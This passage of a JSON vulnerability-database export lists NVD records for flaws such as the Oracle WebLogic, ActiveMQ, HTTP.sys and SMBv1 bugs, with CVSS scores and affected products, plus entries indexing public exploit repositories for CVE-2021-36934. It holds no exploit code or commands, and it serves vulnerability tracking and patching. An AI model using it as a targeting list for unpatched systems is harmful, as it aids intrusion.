"cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", 
"cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:28:50", "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). 
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-19T17:29:00", "type": "cve", "title": "CVE-2017-10271", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:weblogic_server:10.3.6.0.0", "cpe:/a:oracle:weblogic_server:12.2.1.1.0", "cpe:/a:oracle:weblogic_server:12.2.1.2.0", "cpe:/a:oracle:weblogic_server:12.1.3.0.0"], "id": "CVE-2017-10271", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-10271", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-26T14:37:39", "description": "The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request.", "cvss3": 
{"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-06-01T20:59:00", "type": "cve", "title": "CVE-2016-3088", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3088"], "modified": "2019-03-27T20:29:00", "cpe": ["cpe:/a:apache:activemq:5.13.3"], "id": "CVE-2016-3088", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3088", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:activemq:5.13.3:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-28T02:07:57", "description": "HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka \"HTTP.sys Remote Code Execution Vulnerability.\"", "cvss3": {}, "published": "2015-04-14T20:59:00", "type": "cve", "title": "CVE-2015-1635", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1635"], "modified": "2019-05-14T19:53:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_8:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_8.1:-"], "id": "CVE-2015-1635", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1635", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_8:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:24:40", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0148.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 
8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-17T00:59:00", "type": "cve", "title": "CVE-2017-0146", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"], "modified": "2018-06-21T01:29:00", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "id": "CVE-2017-0146", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0146", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:24:40", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0146, and CVE-2017-0148.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": 
"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-17T00:59:00", "type": "cve", "title": "CVE-2017-0145", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"], "modified": "2018-06-21T01:29:00", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "id": "CVE-2017-0145", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0145", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:24:40", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": 
"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-17T00:59:00", "type": "cve", "title": "CVE-2017-0144", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"], "modified": "2018-06-21T01:29:00", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "id": "CVE-2017-0144", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0144", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:24:40", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": 
"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-17T00:59:00", "type": "cve", "title": "CVE-2017-0143", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"], "modified": "2018-06-21T01:29:00", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "id": "CVE-2017-0143", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0143", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:24:40", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0146.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": 
"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-17T00:59:00", "type": "cve", "title": "CVE-2017-0148", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"], "modified": "2018-06-21T01:29:00", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "id": "CVE-2017-0148", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0148", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:24:56", "description": "The kernel-mode drivers in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allow local users to gain privileges via a crafted application, aka \"Win32k Elevation of Privilege Vulnerability.\"", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-12T14:29:00", "type": "cve", "title": 
"CVE-2017-0263", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0263"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1511"], "id": "CVE-2017-0263", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0263", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-28T02:06:45", "description": "The XPC implementation in Admin 
Framework in Apple OS X before 10.10.3 allows local users to bypass authentication and obtain admin privileges via unspecified vectors.", "cvss3": {}, "published": "2015-04-10T14:59:00", "type": "cve", "title": "CVE-2015-1130", "cwe": ["CWE-254"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1130"], "modified": "2015-09-17T17:41:00", "cpe": ["cpe:/o:apple:mac_os_x:10.10.2"], "id": "CVE-2015-1130", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1130", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.10.2:*:*:*:*:*:*:*"]}], "githubexploit": [{"lastseen": "2022-07-13T19:02:52", "description": "# Oxide Hive\nAn exploit for the HiveNightmare/SeriousSAM vulnera...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-12T18:01:21", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-05-01T09:47:57", "id": "4FD5C1B6-357A-5C95-AE75-CF79BDD32592", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:02:55", "description": "# CVE-2021-36934\nFix for...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-21T13:06:51", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-06-18T04:00:43", "id": "C0AB02D4-4AD3-591D-A60F-953AC6D32CF0", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:04:04", "description": 
"CVE-2021\u201336934\n\nThe derived hash is used for forgery such as PTH...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T19:39:28", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-09-20T04:02:17", "id": "37A629E7-9341-5873-B641-E06D7998FA58", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-13T23:54:50", "description": "# CVE-2021-36934\n\nC# implementation of [C...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-24T12:55:05", "type": "githubexploit", "title": "Exploit for Incorrect Permission 
Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-08-13T21:20:25", "id": "D76E0403-C1B5-59A1-A7E5-B8D3BE2E636D", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:33:41", "description": "<p><strong>Windows Elevation of Privilege Vulnerability CVE-2021...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-04T10:37:41", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 